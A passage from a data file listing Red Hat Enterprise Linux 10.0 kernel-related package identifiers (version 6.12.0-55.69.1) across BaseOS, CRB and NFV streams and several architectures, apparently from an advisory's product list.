"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
